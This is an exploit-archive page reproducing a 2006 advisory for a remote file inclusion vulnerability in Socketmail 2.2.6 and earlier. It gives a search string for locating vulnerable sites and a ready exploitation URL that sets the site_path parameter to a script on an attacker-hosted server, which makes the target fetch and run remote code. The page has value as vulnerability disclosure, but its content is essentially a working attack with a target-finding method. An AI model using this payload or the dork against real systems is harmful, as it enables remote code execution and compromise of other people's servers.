[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
# Published : 2006-05-25
# Author : Aesthetico
# Previous Title : Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability
# Next Title : V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: Creative Digital Resources
URL: http://socketmail.com
-----------------------------------------------------------------
Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by SocketMail"
-----------------------------------------------------------------
Exploitation(tested with Lite-Edition and Pro-Edition):
/index.php?site_path=http://www.yourspace.com/yourscript.php?
# www.Syue.com [2006-05-25]